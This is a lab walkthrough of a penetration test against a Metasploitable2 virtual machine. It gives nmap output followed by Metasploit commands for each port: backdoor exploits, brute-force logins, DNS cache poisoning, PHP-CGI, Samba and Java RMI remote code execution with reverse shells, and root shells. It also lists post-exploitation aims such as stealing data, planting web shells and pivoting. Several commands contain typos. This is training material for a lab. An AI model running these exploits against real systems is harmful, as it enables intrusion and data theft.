LHOST - Attacker IP (Listner host)

LPORT - Attacker Port

RHOST - Target IP(Remote host)

RPORT - Target Port

</aside>

1. First find the IP address of metasploitable2 Machine(Target Machine)

sudo netdiscover -r 192.168.1.0/24

• sudo: Runs the command with superuser privileges, which is required for raw packet capture.

• netdiscover: A network reconnaissance tool used to detect live hosts in a network by sending ARP requests.

• r 192.168.1.0/24:

  • r specifies the target network range.

  • 192.168.1.0/24 defines the subnet to scan. This means:

    • 192.168.1.0 is the base network address.

    • /24 indicates a subnet mask of 255.255.255.0, meaning it will scan IPs from 192.168.1.1 to 192.168.1.254.

RESULT

192.168.190.129 could be the victim's machine since it has a different MAC range (00:0c:29), which is common for non-VMware machines.

1. Scanning Open Port of Target Machine

command

sudo nmap 192.168.190.129 -p 0-65535 -sV -sC

• sudo: Runs the command with superuser (root) privileges, which may be necessary for certain network scanning operations.

• nmap: This is the tool being used, short for "Network Mapper." It is a powerful open-source utility for network discovery and security auditing.

• 192.168.190.129: The target IP address to be scanned.

• p 0-65535: Specifies the range of ports to scan. This scans all ports from 0 to 65535, which is the full range of possible ports.

• sV: This option enables version detection. It tries to determine the version of the services running on the open ports.

• sC: This option runs the default set of Nmap scripts (known as NSE – Nmap Scripting Engine). These scripts can check for common vulnerabilities, gather more information about services, and perform other tasks during the scan.

RESULTS

Here It show list of all open port

┌──(luvranjan㉿kali)-[~]
└─$ sudo nmap 192.168.190.129 -p 0-65535 -sV -sC -oN
Starting Nmap 7.94SVN ( [<https://nmap.org>](<https://nmap.org/>) ) at 2025-02-15 10:43 IST
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 96.67% done; ETC: 10:44 (0:00:03 remaining)
Nmap scan report for 192.168.190.129
Host is up (0.00069s latency).
Not shown: 65506 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.190.131
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|*End of status
|ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|*    SSL2_DES_64_CBC_WITH_MD5
|_ssl-date: 2025-02-15T05:15:44+00:00; +7s from scanner time.
|*smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|Not valid after:  2010-04-16T14:07:45
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid:
|  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      37933/udp   mountd
|   100005  1,2,3      46128/tcp   mountd
|   100021  1,3,4      46774/udp   nlockmgr
|   100021  1,3,4      49012/tcp   nlockmgr
|   100024  1          37319/tcp   status
|  100024  1          53661/udp   status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login       OpenBSD or Solaris rlogind
514/tcp   open  tcpwrapped
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info:
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 9
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, ConnectWithDatabase, SupportsTransactions, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag
|   Status: Autocommit
|  Salt: Z~/hBNA:@o4Pu~:C"!{m
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
|ssl-date: 2025-02-15T05:15:44+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|Not valid after:  2010-04-16T14:07:45
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|    VNC Authentication (2)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
| irc-info:
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN
|   uptime: 0 days, 0:46:30
|   source ident: nmap
|   source host: 1D6DEEE3.C0E92E51.FFFA6D49.IP
|  error: Closing Link: wbkyshkjp[192.168.190.131] (Quit: wbkyshkjp)
6697/tcp  open  irc         UnrealIRCd
| irc-info:
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN
|   uptime: 0 days, 0:46:30
|   source ident: nmap
|   source host: 1D6DEEE3.C0E92E51.FFFA6D49.IP
|*  error: Closing Link: zovbkxicu[192.168.190.131] (Quit: zovbkxicu)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
37319/tcp open  status      1 (RPC #100024)
46128/tcp open  mountd      1-3 (RPC #100005)
49012/tcp open  nlockmgr    1-4 (RPC #100021)
54150/tcp open  java-rmi    GNU Classpath grmiregistry
MAC Address: 00:0C:29:B9:45:9A (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2025-02-15T00:15:35-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h15m06s, deviation: 2h30m00s, median: 6s

1. Opening Metasploitable Tool or Framework in Attacker Machine (Kali)

using command

msfconsole

PORT 21

1. Backdoor

1. In msf console search Service Version

search vsFTPd 2.3.4

It show the list of Exploits , Then select the exploits by these command

use 0

or

use exploit/unix/ftp/vsftpf_234_backdoor

After Selecting

1. set the Target IP by

set ROSTS 192.168.190.129

then Run

run

After executions

It show Found shell its means we successfully enter inside the target machine

Here we get the root access like create or delete folder and files

eg

mkdir luvranjan
ls

Also check in metasploitable2 machine

2. Anonymous Login

---

ftp 192.168.190.129 #(TARGET IP)

Enter:

Username: anonymous
Password: (press Enter)

PORT 22 SSH

1. Open MSf console amd search ssh login ,a list is appear , choose the correct option like login check scanner

msfconsole
seach ssh login
use 14

or

auxiliary/scanner/ssh/ssh_login

1. set the Target IP , default username , password text file

set RHOSTS 192.168.190.129
set USER_FILE /home/luvranjan/Desktop/ESEC/usernames.txt 
set PASS_FILE /home/luvranjan/Desktop/ESEC/passwords.txt

RHOSTS specifies the remote target's IP address (in this case, 192.168.190.129).

usernames.txt → Contains a list of usernames.

passwords.txt → Contains a list of passwords.

1. Execute command

run

It start the Bruteforce attack and after successfully run the attack it give the correct ID and Password

With this ID-Pass We can login and go inside the target machine , Access all the file or directory

when i am trying to login getting some this kind of error

If ID_PASS not present in that list

PORT 23 TELNET

1. Open MSf console amd search TELNET login ,a list is appear , choose the correct option like login check scanner

msfconsole
seach telnet login  #check for telnetlogin scanner
use 5

or

auxiliary/scanner/telnet/telnet_login

1. set the Target IP , default username , password text file

set RHOSTS 192.168.190.129
set USER_FILE /home/luvranjan/Desktop/ESEC/usernames.txt
set PASS_FILE /home/luvranjan/Desktop/ESEC/passwords.txt

RHOSTS specifies the remote target's IP address (in this case, 192.168.190.129).

usernames.txt → Contains a list of usernames.

passwords.txt → Contains a list of passwords.

1. Execute the command

run

After trying all ID_PASS it will give the correct one

If ID_PASS not present in the list it will give this types of outputs

Attacker used those ID_PASS and login to the target machine and access all files or directory like this

PORT 25/ smtp

1. Enumeration of Users

1. Commands

msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 > set RHOSTS 192.168.190.129
msf6 > set THREADS 10
msf6 > run  #or exploit

1. Execute

exploit

After successfully execution it will give the list of all user

1. Verifying Users

PORT 53 DNS

<aside> 💡

Exploits available - bailiwicked_domain.rb (DNS Snoffing)

</aside>

1. checking Commands

search bailiwicked
#list is appers select domain attack
use 0 
#or 
auxiliary/spoof/dns/bailiwicked_domain

1. set IP of taget machine and also set domain which use want to snoof

set RHOSTS 192.168.190.129
set DOMAIN google.com #any domain
set set NS ns.luvranjan.com
set NEWDNS 8.8.8.8
set SRCPORT 0
check
run

• RHOSTS → Target DNS Server (Metasploitable2).

• DOMAIN → Domain to poison (e.g., google.com).

• NS → Fake nameserver controlled by the attacker (ns.luvranjan.com).

• NEWDNS → Spoofed IP for the domain (8.8.8.8 in this case).

• SRCPORT → Random source port (0 to avoid detection).

• check → Tests if the target DNS server is vulnerable.

• run → Executes the DNS cache poisoning attack

Results

PORT 80 HTTP

Port 80 is used for HTTP traffic — a popular entry point for hackers to exploit web servers, apps, and CMS platforms. Let’s break this down with some practical Metasploit exploits!

PHP-CGI Argument Injection (CVE-2012-1823)

• Vulnerability: Execute arbitrary commands on Apache/PHP servers.

msfconsole
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.190.129
set TARGETURI /
set LHOST 192.168.190.131
set LPORT 4444
exploit

1. msfconsole → Opens the Metasploit Framework console.

2. use exploit/multi/http/php_cgi_arg_injection → Selects the PHP-CGI argument injection exploit module.

• This exploit targets misconfigured PHP-CGI setups, allowing remote code execution (RCE).

1. set RHOSTS 192.168.190.129 → Specifies the target server (Metasploitable2 in this case).

2. set TARGETURI / → Defines the base URL path to attack (often the web root).

3. set LHOST your_IP → Sets the local attacker’s IP to receive the reverse shell.

4. set LPORT 4444 → Sets the port for the reverse shell listener.

5. exploit → Launches the exploit and (hopefully) opens a reverse shell.

Hackers Successfully Gaining Access

Whats can they do….

• File System Access:

  • Upload/download files, modify web pages (defacement), or inject malicious scripts.

• Database Exfiltration:

  • Access MySQL/PostgreSQL databases, steal sensitive information like usernames, passwords, and credit card details.

• Privilege Escalation:

  • Use local kernel exploits to gain root access.

• Web Shell:

  • Install a PHP backdoor for persistent access (e.g., Weevely or Pentestmonkey PHP shells).

• Pivoting:

  • Use the compromised server as a launchpad to attack other systems on the internal network.

• Service Disruption:

  • Delete or modify critical files, rendering the website or application non-functional.

1. Shellshock Exploit (CVE-2014-6271)

• Vulnerability: Bash environment injection on CGI scripts (might work if CGI is enabled).

msfconsole
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.168.190.129
set TARGETURI /cgi-bin/test.cgi
set LHOST your_IP
set LPORT 4444
exploit

No session created.

PORT - 111/tcp

Cannot get the Meterpreter access

PORT - 139/tcp

NetBIOS Session Service

• Service: Used for Windows file/printer sharing (SMB over NetBIOS).

• Risk: Can expose file shares, user accounts, and be leveraged for remote code execution or lateral movement.

Samba Usermap Script Exploit

Metasploit Commands:

msfconsole
use exploit/multi/samba/usermap_script       # Load the Samba usermap exploit
set RHOSTS 192.168.190.129                   # Target IP
run                                          # Launch the exploit

Result

Get the Root access , here we can do any things

1. SMB Brute-Force (Using Metasploit)

set RHOSTS 192.168.190.129
set USER_FILE /home/luvranjan/Desktop/ESEC/usernames.txt
set PASS_FILE /home/luvranjan/Desktop/ESEC/passwords.txt

Result

Failed

PORT 445/tcp SMB (Server Message Block)

Samba Usermap Script Exploit

Metasploit Commands:

msfconsole
use exploit/multi/samba/usermap_script       # Load the Samba usermap exploit
set RHOSTS 192.168.190.129                   # Target IP
set RPORT 445                                #Target Port
run                                          # Launch the exploit

Result

Get the Root access , here we can do any things

PORT 6667 IRC (Internet Relay Chat)

1. search irc

1. select Backdoor

1. Set Target ip and also set payloads

1. After Run , Hackers Get the Root Access

PORT 512/tcp open exec netkit-rsh rexecd

*513/tcp open login OpenBSD or Solaris rlogind

514/tcp open tcpwrapped*

• Service: Allows remote command execution on Unix/Linux systems.

• Risk: Extremely high — cleartext authentication, vulnerable to credential theft, remote code execution (RCE), and lateral movement.

1. rexec Login Brute Force:

msfconsole
use auxiliary/scanner/rservices/rexec_login
set RHOSTS 192.168.190.129
set USERNAME root
set PASSWORD toor
exploit

👉 Result: Remote command execution with weak/default credentials.

Attempting correct user name of password (also not giving the access)

Using rlogin command direct in terminal

rlogin -l root 192.168.190.129

Successfully get the root access and also create a folder on desktop ,name rlogin

Verifying this folder creation in Target Machine

PORT - 1099/tcp open java-rmi GNU Classpath grmiregistry

Use Metasploit to search for RMI vulnerabilities

msfconsole
search rmi

• This lists RMI-related exploits. Look for ones like rmi_server or java_rmi_server.

• A common exploit:

use exploit/multi/misc/java_rmi_server
set RHOSTS 192.168.190.129
set RPORT 1099
set LHOST 192.168.190.131
set LPORT 4444
exploit

👉 This exploit targets insecure RMI services to achieve remote code execution (RCE).

Got a Meterpreter session

PORT 1524/tcp open bindshell Metasploitable root shell

Root bind shell = meaning anyone can connect to it without authentication.

Command

msfconsole
use exploit/multi/handler
set PAYLOAD cmd/unix/bind_perl
set RHOST 192.168.190.129
set RPORT 1524
exploit

Result

Successfully get the root access, with this Hackers can do anything like access all fine , directory and also create or Delete any file or folder.

Methods 2 (BY using Netcat)

netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP

netcat “Target IP “ “Port no.”

PORT - 2049/tcp open nfs 2-4 (RPC #100003)

Metasploit NFS Enumeration

msfconsole
auxiliary/scanner/nfs/nfsmount 
set rhost 192.168.190.129
set rport 2049
exploit

Result

Failed

PORT - 2121/tcp open ftp ProFTPD 1.3.1

1. Backdoor

search proftpd
exploit/unix/ftp/proftpd_133c_backdoor 
set rhost 192.168.190.129
exploit

Result

Failed

1. Check for anonymous login:

ftp 192.168.190.129 2121
Name: anonymous
Password: anything

Result

Failed

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

1. Exploit MySQL authentication bypass

This older MySQL version is vulnerable to an authentication bypass — we can try this with Metasploit’s mysql_authbypass_hashdump module!

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 192.168.190.129
run

Result

FAILED

1. MySQL Command Execution (CVE-2012-2122)

MySQL 5.0 is vulnerable to CVE-2012-2122, a password verification flaw where incorrect passwords have a high chance of succeeding.

brute-force the login:

use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.190.129
set USERNAME root
set PASS_FILE /home/luvranjan/Desktop/ESEC/passwords.txt
run

RESULTS

FAILED

PORT - 5900/tcp open vnc VNC (protocol 3.3)

1. Check for no authentication:

vncviewer 192.168.190.129:5900

Output

1. Brute force with Metasploit:

use auxiliary/scanner/vnc/vnc_login
set RHOSTS 192.168.190.129
set RPORT 5900
set PASS_FILE /home/luvranjan/Desktop/ESEC/passwords.txt
run

OUTPUT

Successfully give the password

🔗 Connect with Me

• 💼 LinkedIn: Hritik Ranjan

• 🐙 GitHub: hritikranjan1

• 📢 Join my Telegram Community: Click Here

Follow me: LinkedIn | GitHub | Telegram